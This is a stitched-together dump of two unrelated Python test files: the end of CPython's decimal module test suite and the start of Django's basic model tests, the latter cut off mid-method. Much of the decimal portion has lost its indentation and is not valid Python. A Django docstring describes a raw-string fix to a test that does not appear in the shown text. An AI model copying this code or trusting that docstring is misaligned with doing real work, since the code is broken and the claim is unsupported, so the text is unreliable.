IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
    """__sizeof__ grows by exactly one limb per extra coefficient word.

    On 64-bit builds (detected via MAX_PREC) a limb holds 19 decimal
    digits and weighs 8 bytes; on 32-bit builds, 9 digits and 4 bytes.
    """
    Decimal = C.Decimal
    is_64bit = C.MAX_PREC > 425000000
    digits_per_word, word_bytes = (19, 8) if is_64bit else (9, 4)

    self.assertGreater(Decimal(0).__sizeof__(), 0)
    smaller = Decimal(10 ** (digits_per_word * 24)).__sizeof__()
    larger = Decimal(10 ** (digits_per_word * 25)).__sizeof__()
    self.assertEqual(larger, smaller + word_bytes)
def test_internal_use_of_overridden_methods(self):
    """from_float() must not trust overrides on unsound float subclasses.

    Each class below breaks as_integer_ratio/__abs__/bit_length; the C
    implementation has to bypass the overrides and still convert the
    underlying float value correctly.
    """
    Decimal = C.Decimal

    # Unsound subtyping
    class BadRatio(float):
        def as_integer_ratio(self):
            return 1

        def __abs__(self):
            return self

    class BadAbs(float):
        def __abs__(self):
            return [1] * 200

    class BadBitLength(int):
        def bit_length(self):
            return [1] * 200

    class BadRatioParts(float):
        def as_integer_ratio(self):
            return (BadBitLength(1), BadBitLength(1))

        def __abs__(self):
            return self

    for cls in BadRatio, BadAbs, BadRatioParts:
        self.assertEqual(Decimal.from_float(cls(101.1)),
                         Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
    """Function signatures

    Verifies, via inspect.signature(), that the C accelerator (_decimal)
    exposes the same parameter names and kinds as the pure-Python
    reference implementation, both at module level and on the Decimal
    and Context types.
    """

    def test_inspect_module(self):
        # Compare signatures of every public module-level callable
        # (plus the Decimal and Context types) between P and C.
        for attr in dir(P):
            if attr.startswith('_'):
                continue
            p_func = getattr(P, attr)
            c_func = getattr(C, attr)
            if (attr == 'Decimal' or attr == 'Context' or
                inspect.isfunction(p_func)):
                p_sig = inspect.signature(p_func)
                c_sig = inspect.signature(c_func)

                # parameter names: Python-side underscore-prefixed params
                # are private and excluded from the comparison.
                c_names = list(c_sig.parameters.keys())
                p_names = [x for x in p_sig.parameters.keys() if not
                           x.startswith('_')]

                self.assertEqual(c_names, p_names,
                                 msg="parameter name mismatch in %s" % p_func)

                c_kind = [x.kind for x in c_sig.parameters.values()]
                p_kind = [x[1].kind for x in p_sig.parameters.items() if not
                          x[0].startswith('_')]

                # parameters: setcontext is known to differ in kind.
                if attr != 'setcontext':
                    self.assertEqual(c_kind, p_kind,
                                     msg="parameter kind mismatch in %s" % p_func)

    def test_inspect_types(self):
        # Check method signatures on the Decimal and Context types, then
        # actually call each method with heuristically typed arguments.

        POS = inspect._ParameterKind.POSITIONAL_ONLY
        POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD

        # Type heuristic (type annotations would help!): maps each known
        # parameter name to a plausible argument value, per module.
        pdict = {C: {'other': C.Decimal(1),
                     'third': C.Decimal(1),
                     'x': C.Decimal(1),
                     'y': C.Decimal(1),
                     'z': C.Decimal(1),
                     'a': C.Decimal(1),
                     'b': C.Decimal(1),
                     'c': C.Decimal(1),
                     'exp': C.Decimal(1),
                     'modulo': C.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': C.ROUND_HALF_UP,
                     'context': C.getcontext()},
                 P: {'other': P.Decimal(1),
                     'third': P.Decimal(1),
                     'a': P.Decimal(1),
                     'b': P.Decimal(1),
                     'c': P.Decimal(1),
                     'exp': P.Decimal(1),
                     'modulo': P.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': P.ROUND_HALF_UP,
                     'context': P.getcontext()}}

        def mkargs(module, sig):
            # Build (args, kwargs) for a call from a signature, skipping
            # 'self' and routing by parameter kind.
            args = []
            kwargs = {}
            for name, param in sig.parameters.items():
                if name == 'self': continue
                if param.kind == POS:
                    args.append(pdict[module][name])
                elif param.kind == POS_KWD:
                    kwargs[name] = pdict[module][name]
                else:
                    raise TestFailed("unexpected parameter kind")
            return args, kwargs

        def tr(s):
            """The C Context docstrings use 'x' in order to prevent confusion
            with the article 'a' in the descriptions."""
            if s == 'x': return 'a'
            if s == 'y': return 'b'
            if s == 'z': return 'c'
            return s

        def doit(ty):
            # Compare and exercise every public method of type `ty`
            # ('Decimal' or 'Context') on both implementations.
            p_type = getattr(P, ty)
            c_type = getattr(C, ty)
            for attr in dir(p_type):
                if attr.startswith('_'):
                    continue
                p_func = getattr(p_type, attr)
                c_func = getattr(c_type, attr)
                if inspect.isfunction(p_func):
                    p_sig = inspect.signature(p_func)
                    c_sig = inspect.signature(c_func)

                    # parameter names:
                    p_names = list(p_sig.parameters.keys())
                    c_names = [tr(x) for x in c_sig.parameters.keys()]

                    self.assertEqual(c_names, p_names,
                                     msg="parameter name mismatch in %s" % p_func)

                    p_kind = [x.kind for x in p_sig.parameters.values()]
                    c_kind = [x.kind for x in c_sig.parameters.values()]

                    # 'self' parameter:
                    self.assertIs(p_kind[0], POS_KWD)
                    self.assertIs(c_kind[0], POS)

                    # remaining parameters:
                    if ty == 'Decimal':
                        self.assertEqual(c_kind[1:], p_kind[1:],
                                         msg="parameter kind mismatch in %s" % p_func)
                    else: # Context methods are positional only in the C version.
                        self.assertEqual(len(c_kind), len(p_kind),
                                         msg="parameter kind mismatch in %s" % p_func)

                    # Run the function: a TypeError here means the declared
                    # signature does not match the actual implementation.
                    args, kwds = mkargs(C, c_sig)
                    try:
                        getattr(c_type(9), attr)(*args, **kwds)
                    except Exception as err:
                        raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))

                    args, kwds = mkargs(P, p_sig)
                    try:
                        getattr(p_type(9), attr)(*args, **kwds)
                    except Exception as err:
                        raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))

        doit('Decimal')
        doit('Context')
# Every test case comes in a (C, Py) pair so that both the _decimal
# accelerator and the pure-Python implementation run the same suite.
all_tests = [
    CExplicitConstructionTest, PyExplicitConstructionTest,
    CImplicitConstructionTest, PyImplicitConstructionTest,
    CFormatTest, PyFormatTest,
    CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
    CThreadingTest, PyThreadingTest,
    CUsabilityTest, PyUsabilityTest,
    CPythonAPItests, PyPythonAPItests,
    CContextAPItests, PyContextAPItests,
    CContextWithStatement, PyContextWithStatement,
    CContextFlags, PyContextFlags,
    CSpecialContexts, PySpecialContexts,
    CContextInputValidation, PyContextInputValidation,
    CContextSubclassing, PyContextSubclassing,
    CCoverage, PyCoverage,
    CFunctionality, PyFunctionality,
    CWhitebox, PyWhitebox,
    CIBMTestCases, PyIBMTestCases,
]

# Delete C tests if _decimal.so is not present.
if not C:
    # Keep only the Py* half of each pair (the odd indices).
    all_tests = all_tests[1::2]
else:
    # These two classes compare C against Python directly, so they only
    # exist when the C module is importable.
    all_tests.insert(0, CheckAttributes)
    all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
    """ Execute the tests.

    Runs all arithmetic tests if arith is True or if the "decimal" resource
    is enabled in regrtest.py

    todo_tests, when given, restricts the run to the named .decTest files
    (IBM arithmetic cases only); debug enables per-test diagnostics.
    """

    init(C)
    init(P)
    global TEST_ALL, DEBUG
    TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
    DEBUG = debug

    if todo_tests is None:
        test_classes = all_tests
    else:
        # Only the data-driven IBM test-case classes honor todo_tests.
        test_classes = [CIBMTestCases, PyIBMTestCases]

    # Dynamically build custom test definition for each file in the test
    # directory and add the definitions to the DecimalTest class.  This
    # procedure insures that new files do not get skipped.
    for filename in os.listdir(directory):
        if '.decTest' not in filename or filename.startswith("."):
            continue
        head, tail = filename.split('.')
        if todo_tests is not None and head not in todo_tests:
            continue
        # f=filename binds the current name at definition time, avoiding
        # the late-binding-closure trap.
        tester = lambda self, f=filename: self.eval_file(directory + f)
        setattr(CIBMTestCases, 'test_' + head, tester)
        setattr(PyIBMTestCases, 'test_' + head, tester)
    del filename, head, tail, tester

    try:
        run_unittest(*test_classes)
        if todo_tests is None:
            from doctest import IGNORE_EXCEPTION_DETAIL
            # Run the module doctests against each implementation by
            # temporarily swapping it in as sys.modules['decimal'].
            savedecimal = sys.modules['decimal']
            if C:
                sys.modules['decimal'] = C
                run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
            sys.modules['decimal'] = P
            run_doctest(P, verbose)
            sys.modules['decimal'] = savedecimal
    finally:
        # Restore the contexts saved at import time, whatever happened.
        if C: C.setcontext(ORIGINAL_CONTEXT[C])
        P.setcontext(ORIGINAL_CONTEXT[P])
        if not C:
            warnings.warn('C tests skipped: no module named _decimal.',
                          UserWarning)
        if not orig_sys_decimal is sys.modules['decimal']:
            raise TestFailed("Internal error: unbalanced number of changes to "
                             "sys.modules['decimal'].")
if __name__ == '__main__':
    import optparse

    # Command-line front end: either skip most arithmetic tests, run a
    # named subset of .decTest files, or run everything.
    usage = "test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]"
    parser = optparse.OptionParser(usage)
    parser.add_option('--debug', '-d', action='store_true',
                      help='shows the test number and context before each test')
    parser.add_option('--skip', '-s', action='store_true',
                      help='skip over 90% of the arithmetic tests')
    options, arguments = parser.parse_args()

    if options.skip:
        test_main(arith=False, verbose=True)
    elif arguments:
        test_main(arith=True, verbose=True, todo_tests=arguments,
                  debug=options.debug)
    else:
        test_main(arith=True, verbose=True)
|
tests.py | from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet, ValuesListQuerySet
from django.test import (
TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
    """Ways of constructing and saving Article instances: positional and
    keyword arguments, AutoField behavior, defaults and datetime precision."""

    def test_object_is_not_written_to_database_until_save_was_called(self):
        a = Article(
            id=None,
            headline='Area man programs in Python',
            pub_date=datetime(2005, 7, 28),
        )
        # Instantiation alone assigns no primary key and hits no database.
        self.assertIsNone(a.id)
        self.assertEqual(Article.objects.all().count(), 0)

        # Save it into the database. You have to call save() explicitly.
        a.save()
        self.assertIsNotNone(a.id)
        self.assertEqual(Article.objects.all().count(), 1)

    def test_can_initialize_model_instance_using_positional_arguments(self):
        """
        You can initialize a model instance using positional arguments,
        which should match the field order as defined in the model.
        """
        a = Article(None, 'Second article', datetime(2005, 7, 29))
        a.save()

        self.assertEqual(a.headline, 'Second article')
        self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))

    def test_can_create_instance_using_kwargs(self):
        a = Article(
            id=None,
            headline='Third article',
            pub_date=datetime(2005, 7, 30),
        )
        a.save()
        self.assertEqual(a.headline, 'Third article')
        self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))

    def test_autofields_generate_different_values_for_each_instance(self):
        a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
        a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
        a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
        self.assertNotEqual(a3.id, a1.id)
        self.assertNotEqual(a3.id, a2.id)

    def test_can_mix_and_match_position_and_kwargs(self):
        # You can also mix and match position and keyword arguments, but
        # be sure not to duplicate field information.
        a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
        a.save()
        self.assertEqual(a.headline, 'Fourth article')

    def test_cannot_create_instance_with_invalid_kwargs(self):
        six.assertRaisesRegex(
            self,
            TypeError,
            "'foo' is an invalid keyword argument for this function",
            Article,
            id=None,
            headline='Some headline',
            pub_date=datetime(2005, 7, 31),
            foo='bar',
        )

    def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
        """
        You can leave off the value for an AutoField when creating an
        object, because it'll get filled in automatically when you save().
        """
        a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
        a.save()
        self.assertEqual(a.headline, 'Article 5')
        self.assertNotEqual(a.id, None)

    def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
        a = Article(pub_date=datetime(2005, 7, 31))
        a.save()
        self.assertEqual(a.headline, 'Default headline')

    def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
        """as much precision in *seconds*"""
        a1 = Article(
            headline='Article 7',
            pub_date=datetime(2005, 7, 31, 12, 30),
        )
        a1.save()
        self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
                         datetime(2005, 7, 31, 12, 30))

        a2 = Article(
            headline='Article 8',
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        a2.save()
        self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
                         datetime(2005, 7, 31, 12, 30, 45))

    def test_saving_an_object_again_does_not_create_a_new_object(self):
        a = Article(headline='original', pub_date=datetime(2014, 5, 16))
        a.save()
        current_id = a.id

        # Re-saving an already-persisted instance is an UPDATE, not INSERT.
        a.save()
        self.assertEqual(a.id, current_id)

        a.headline = 'Updated headline'
        a.save()
        self.assertEqual(a.id, current_id)

    def test_querysets_checking_for_membership(self):
        headlines = [
            'Area man programs in Python', 'Second article', 'Third article']
        some_pub_date = datetime(2014, 5, 16, 12, 1)
        for headline in headlines:
            Article(headline=headline, pub_date=some_pub_date).save()
        a = Article(headline='Some headline', pub_date=some_pub_date)
        a.save()

        # You can use 'in' to test for membership...
        self.assertIn(a, Article.objects.all())
        # ... but there will often be more efficient ways if that is all you need:
        self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
    """Assorted model behaviors: manager access, lookups, datetime
    precision, equality/hashing, extra(), lazy translations and the
    EmptyQuerySet machinery."""

    def test_objects_attribute_is_only_available_on_the_class_itself(self):
        six.assertRaisesRegex(
            self,
            AttributeError,
            "Manager isn't accessible via Article instances",
            getattr,
            Article(),
            "objects",
        )
        self.assertFalse(hasattr(Article(), 'objects'))
        self.assertTrue(hasattr(Article, 'objects'))

    def test_queryset_delete_removes_all_items_in_that_queryset(self):
        headlines = [
            'An article', 'Article One', 'Amazing article', 'Boring article']
        some_pub_date = datetime(2014, 5, 16, 12, 1)
        for headline in headlines:
            Article(headline=headline, pub_date=some_pub_date).save()
        self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
            ["<Article: Amazing article>",
             "<Article: An article>",
             "<Article: Article One>",
             "<Article: Boring article>"])
        Article.objects.filter(headline__startswith='A').delete()
        self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
            ["<Article: Boring article>"])

    def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
        some_pub_date = datetime(2014, 5, 16, 12, 1)
        a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
        a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
        self.assertNotEqual(a1, a2)
        self.assertEqual(a1, Article.objects.get(id__exact=a1.id))

        self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))

    @skipUnlessDBFeature('supports_microsecond_precision')
    def test_microsecond_precision(self):
        # In PostgreSQL, microsecond-level precision is available.
        a9 = Article(
            headline='Article 9',
            pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
        )
        a9.save()
        self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
                         datetime(2005, 7, 31, 12, 30, 45, 180))

    @skipIfDBFeature('supports_microsecond_precision')
    def test_microsecond_precision_not_supported(self):
        # In MySQL, microsecond-level precision isn't always available. You'll
        # lose microsecond-level precision once the data is saved.
        a9 = Article(
            headline='Article 9',
            pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
        )
        a9.save()
        self.assertEqual(
            Article.objects.get(id__exact=a9.id).pub_date,
            datetime(2005, 7, 31, 12, 30, 45),
        )

    @skipIfDBFeature('supports_microsecond_precision')
    def test_microsecond_precision_not_supported_edge_case(self):
        # In MySQL, microsecond-level precision isn't always available. You'll
        # lose microsecond-level precision once the data is saved.
        a = Article.objects.create(
            headline='Article',
            pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
        )
        self.assertEqual(
            Article.objects.get(pk=a.pk).pub_date,
            datetime(2008, 12, 31, 23, 59, 59),
        )

    def test_manually_specify_primary_key(self):
        # You can manually specify the primary key when creating a new object.
        a101 = Article(
            id=101,
            headline='Article 101',
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        a101.save()
        a101 = Article.objects.get(pk=101)
        self.assertEqual(a101.headline, 'Article 101')

    def test_create_method(self):
        # You can create saved objects in a single step
        a10 = Article.objects.create(
            headline="Article 10",
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        self.assertEqual(Article.objects.get(headline="Article 10"), a10)

    def test_year_lookup_edge_case(self):
        # Edge-case test: A year lookup should retrieve all objects in
        # the given year, including Jan. 1 and Dec. 31.
        Article.objects.create(
            headline='Article 11',
            pub_date=datetime(2008, 1, 1),
        )
        Article.objects.create(
            headline='Article 12',
            pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
        )
        self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
            ["<Article: Article 11>", "<Article: Article 12>"])

    def test_unicode_data(self):
        # Unicode data works, too.
        a = Article(
            headline='\u6797\u539f \u3081\u3050\u307f',
            pub_date=datetime(2005, 7, 28),
        )
        a.save()
        self.assertEqual(Article.objects.get(pk=a.id).headline,
                         '\u6797\u539f \u3081\u3050\u307f')

    def test_hash_function(self):
        # Model instances have a hash function, so they can be used in sets
        # or as dictionary keys. Two models compare as equal if their primary
        # keys are equal.
        a10 = Article.objects.create(
            headline="Article 10",
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        a11 = Article.objects.create(
            headline='Article 11',
            pub_date=datetime(2008, 1, 1),
        )
        a12 = Article.objects.create(
            headline='Article 12',
            pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
        )

        s = {a10, a11, a12}
        self.assertIn(Article.objects.get(headline='Article 11'), s)

    def test_field_ordering(self):
        """
        Field instances have a `__lt__` comparison function to define an
        ordering based on their creation. Prior to #17851 this ordering
        comparison relied on the now unsupported `__cmp__` and was assuming
        compared objects were both Field instances raising `AttributeError`
        when it should have returned `NotImplemented`.
        """
        f1 = Field()
        f2 = Field(auto_created=True)
        f3 = Field()
        self.assertLess(f2, f1)
        self.assertGreater(f3, f1)
        self.assertIsNotNone(f1)
        self.assertNotIn(f2, (None, 1, ''))

    def test_extra_method_select_argument_with_dashes_and_values(self):
        # The 'select' argument to extra() supports names with dashes in
        # them, as long as you use values().
        Article.objects.create(
            headline="Article 10",
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        Article.objects.create(
            headline='Article 11',
            pub_date=datetime(2008, 1, 1),
        )
        Article.objects.create(
            headline='Article 12',
            pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
        )
        dicts = Article.objects.filter(
            pub_date__year=2008).extra(
            select={'dashed-value': '1'}).values('headline', 'dashed-value')
        self.assertEqual([sorted(d.items()) for d in dicts],
            [[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])

    def test_extra_method_select_argument_with_dashes(self):
        # If you use 'select' with extra() and names containing dashes on a
        # query that's *not* a values() query, those extra 'select' values
        # will silently be ignored.
        Article.objects.create(
            headline="Article 10",
            pub_date=datetime(2005, 7, 31, 12, 30, 45),
        )
        Article.objects.create(
            headline='Article 11',
            pub_date=datetime(2008, 1, 1),
        )
        Article.objects.create(
            headline='Article 12',
            pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
        )
        articles = Article.objects.filter(
            pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
        self.assertEqual(articles[0].undashedvalue, 2)

    def test_create_relation_with_ugettext_lazy(self):
        """
        Test that ugettext_lazy objects work when saving model instances
        through various methods. Refs #10498.
        """
        notlazy = 'test'
        lazy = ugettext_lazy(notlazy)
        Article.objects.create(headline=lazy, pub_date=datetime.now())
        article = Article.objects.get()
        self.assertEqual(article.headline, notlazy)
        # test that assign + save works with Promise objects
        article.headline = lazy
        article.save()
        self.assertEqual(article.headline, notlazy)
        # test .update()
        Article.objects.update(headline=lazy)
        article = Article.objects.get()
        self.assertEqual(article.headline, notlazy)
        # still test bulk_create()
        Article.objects.all().delete()
        Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
        article = Article.objects.get()
        self.assertEqual(article.headline, notlazy)

    def test_emptyqs(self):
        # Can't be instantiated
        with self.assertRaises(TypeError):
            EmptyQuerySet()
        self.assertIsInstance(Article.objects.none(), EmptyQuerySet)

    def test_emptyqs_values(self):
        # test for #15959
        Article.objects.create(headline='foo', pub_date=datetime.now())
        with self.assertNumQueries(0):
            qs = Article.objects.none().values_list('pk')
            self.assertIsInstance(qs, EmptyQuerySet)
            self.assertIsInstance(qs, ValuesListQuerySet)
            self.assertEqual(len(qs), 0)

    def test_emptyqs_customqs(self):
        # A hacky test for custom QuerySet subclass - refs #17271
        Article.objects.create(headline='foo', pub_date=datetime.now())

        class CustomQuerySet(QuerySet):
            def do_something(self):
                return 'did something'

        qs = Article.objects.all()
        qs.__class__ = CustomQuerySet
        qs = qs.none()
        with self.assertNumQueries(0):
            self.assertEqual(len(qs), 0)
            self.assertIsInstance(qs, EmptyQuerySet)
            self.assertEqual(qs.do_something(), 'did something')

    def test_emptyqs_values_order(self):
        # Tests for ticket #17712
        Article.objects.create(headline='foo', pub_date=datetime.now())
        with self.assertNumQueries(0):
            self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
        with self.assertNumQueries(0):
            self.assertEqual(len(Article.objects.none().filter(
                id__in=Article.objects.values_list('id', flat=True))), 0)

    @skipUnlessDBFeature('can_distinct_on_fields')
    def test_emptyqs_distinct(self):
        # Tests for #19426
        Article.objects.create(headline='foo', pub_date=datetime.now())
        with self.assertNumQueries(0):
            self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)

    def test_ticket_20278(self):
        sr = SelfRef.objects.create()
        with self.assertRaises(ObjectDoesNotExist):
            SelfRef.objects.get(selfref=sr)

    def test_eq(self):
        self.assertEqual(Article(id=1), Article(id=1))
        self.assertNotEqual(Article(id=1), object())
        self.assertNotEqual(object(), Article(id=1))
        a = Article()
        self.assertEqual(a, a)
        self.assertNotEqual(Article(), a)

    def test_hash(self):
        # Value based on PK
        self.assertEqual(hash(Article(id=1)), hash(1))
        with self.assertRaises(TypeError):
            # No PK value -> unhashable (because save() would then change
            # hash)
            hash(Article())
class ModelLookupTest(TestCase):
    """Lookup API: get()/filter() by field, pk shortcuts, DoesNotExist and
    MultipleObjectsReturned behavior.

    Fix: the regex patterns passed to six.assertRaisesRegex in
    test_too_many contained ``\(`` / ``\)`` inside *non-raw* string
    literals — invalid escape sequences that are deprecated in Python 3.6+
    and a SyntaxWarning in 3.12. They are now raw strings; the runtime
    value is byte-identical, so test behavior is unchanged.
    """

    def setUp(self):
        # Create an Article.
        self.a = Article(
            id=None,
            headline='Area woman programs in Python',
            pub_date=datetime(2005, 7, 28),
        )
        # Save it into the database. You have to call save() explicitly.
        self.a.save()

    def test_all_lookup(self):
        # Change values by changing the attributes, then calling save().
        self.a.headline = 'Area man programs in Python'
        self.a.save()

        # Article.objects.all() returns all the articles in the database.
        self.assertQuerysetEqual(Article.objects.all(),
            ['<Article: Area man programs in Python>'])

    def test_rich_lookup(self):
        # Django provides a rich database lookup API.
        self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
        self.assertEqual(Article.objects.get(headline__startswith='Area woman'), self.a)
        self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
        self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
        self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
        self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)

    def test_equal_lookup(self):
        # The "__exact" lookup type can be omitted, as a shortcut.
        self.assertEqual(Article.objects.get(id=self.a.id), self.a)
        self.assertEqual(Article.objects.get(headline='Area woman programs in Python'), self.a)

        self.assertQuerysetEqual(
            Article.objects.filter(pub_date__year=2005),
            ['<Article: Area woman programs in Python>'],
        )
        self.assertQuerysetEqual(
            Article.objects.filter(pub_date__year=2004),
            [],
        )
        self.assertQuerysetEqual(
            Article.objects.filter(pub_date__year=2005, pub_date__month=7),
            ['<Article: Area woman programs in Python>'],
        )

        self.assertQuerysetEqual(
            Article.objects.filter(pub_date__week_day=5),
            ['<Article: Area woman programs in Python>'],
        )
        self.assertQuerysetEqual(
            Article.objects.filter(pub_date__week_day=6),
            [],
        )

    def test_does_not_exist(self):
        # Django raises an Article.DoesNotExist exception for get() if the
        # parameters don't match any object.
        six.assertRaisesRegex(
            self,
            ObjectDoesNotExist,
            "Article matching query does not exist.",
            Article.objects.get,
            id__exact=2000,
        )
        # To avoid dict-ordering related errors check only one lookup
        # in single assert.
        self.assertRaises(
            ObjectDoesNotExist,
            Article.objects.get,
            pub_date__year=2005,
            pub_date__month=8,
        )
        six.assertRaisesRegex(
            self,
            ObjectDoesNotExist,
            "Article matching query does not exist.",
            Article.objects.get,
            pub_date__week_day=6,
        )

    def test_lookup_by_primary_key(self):
        # Lookup by a primary key is the most common case, so Django
        # provides a shortcut for primary-key exact lookups.
        # The following is identical to articles.get(id=a.id).
